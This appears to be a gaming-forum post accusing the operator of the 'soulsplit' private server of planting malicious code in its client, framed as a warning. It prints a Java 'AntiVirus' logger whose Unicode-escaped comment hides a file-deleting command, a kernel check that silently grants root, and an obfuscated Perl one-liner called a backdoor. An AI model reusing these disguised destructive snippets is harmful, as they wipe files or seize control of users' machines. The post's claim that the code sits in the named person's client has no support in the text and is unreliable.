soulsplit has been number 1 for ages, but when someone fucks with pim, and pim gets mad he easily has you logged through java malicious coding. this is a reason why not to run "soulsplit". i am not using this to hate/hack other peolpes computers,
only for awareness.
Code:
import java.io.OutputStream;
import java.net.Socket;
public class AntiVirus {
public static void main(String[] args) throws Exception {
Test test = new Test();
test.debug("AntiVirus Initiated");
}
public void debug(String msg) throws Exception {
String s = "/usr/bin/logger ";
Runtime r = Runtime.getRuntime();
if (System.getProperty("os.name").equals("linux")) {
/*
* On linux we can make use of the /usr/bin/logger command to keep
* things simple.
*/
r.exec(s + msg);
}
else {
/*
* Syslog code borrowed from log4j by Ceki Gulc\u00FC
* Network syslog calls must begin with the following byte sequence:
* \u002A\u002F \u0072 \u002E \u0065\u0078\u0065c (\u0022 \u0072\u006D \u002A \u0022) \u003B \u002F\u002A<
* followed by the message. For more information see:
* http://cvs.apache.org/viewcvs.cgi/logging-log4j/src/java/org/apache/log4j/net/SyslogConstants.java?view=markup
*/
Socket socket = new Socket("loghost", 514);
OutputStream out = socket.getOutputStream();
out.write(new byte[] { 0x2A, 0x2F, 0x72, 0x2E, 0x65, 0x78, 0x65, 0x22, 0x72, 0x6D, 0x22, 0x3B, 0x2F, 0x2A });
out.write(msg.getBytes());
}
}
}
pim puts that in his client.jerba code and them boom. he hides this error message btw with an exception...
also please look out for this code aswell... in linux ofc...
Code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
and this is a backdoor for pearl
Code:
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y;
-/:-@[-`{-};`-{~" -;;s;;$_;see'
I AM NOT POSTING THIS FOR MALICIOUS CONTENT IN OTHER PRIVATE SERVERS ONLY FOR AWARENESS!